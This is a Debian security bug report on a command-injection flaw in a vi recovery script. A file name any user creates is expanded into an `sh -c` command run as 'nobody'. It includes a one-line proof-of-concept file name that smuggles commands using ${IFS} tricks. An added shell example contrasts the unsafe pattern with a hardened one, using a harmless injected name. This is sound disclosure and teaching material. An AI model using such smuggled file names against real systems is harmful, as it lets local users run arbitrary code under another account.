Control: tags -1 + security

* Adam M. Costello <bug.amc...@nicemice.net>, 2014-11-15, 20:47:
(su - nobody -s /bin/sh -c "$SENDMAIL $owner < $i" &) </dev/null >/dev/null 2>&0
Note that "$i" is a name of a file any user can create. This allows executing arbitrary code as user "nobody".
PoC exploit:

$ echo 'X-vi-recover-path: /etc/fstab' > '/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'

-- 
Jakub Wilk
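
The quoting problem described above, shown beside a form that keeps the file name out of the command text. This is an added example, not part of the original message or of the script it quotes. Assumptions: `su` is left out so it runs unprivileged, `MAILER` (default `true`) stands in for `$SENDMAIL` as a single program path, and the file name and address are constructed samples.

```shell
#!/bin/sh
# Added example: a file name expanded into `sh -c` text is parsed as shell
# syntax; the same name passed as a positional parameter is only data.
# MAILER is a hypothetical stand-in for $SENDMAIL (assumed: one program path).
MAILER=${MAILER:-true}

# Pattern of the quoted line: owner and file name become part of the command
# string, so the inner shell interprets any metacharacters in the NAME.
deliver_unsafe() {   # $1 = owner, $2 = file
    sh -c "$MAILER $1 < $2" >/dev/null 2>&1
}

# Hardened form: the command string is a constant. Mailer, owner and file
# name arrive as "$1" "$2" "$3" and are expanded only inside double quotes.
deliver_safe() {     # $1 = owner, $2 = file
    sh -c '"$1" "$2" < "$3"' sh "$MAILER" "$1" "$2" >/dev/null 2>&1
}

# Runs one delivery function on a constructed file name that contains shell
# syntax. Prints "marker-created" if the name was executed, "inert" if not.
probe() {            # $1 = deliver_unsafe | deliver_safe
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        name='recover.demo;touch marker'          # constructed sample name
        printf 'X-vi-recover-path: /tmp/demo\n' > "$name"
        "$1" owner@example.invalid "$name" || :
        [ -e marker ] && echo marker-created || echo inert
    )
    rm -rf "$dir"
}

printf 'unsafe: %s\nsafe:   %s\n' "$(probe deliver_unsafe)" "$(probe deliver_safe)"
```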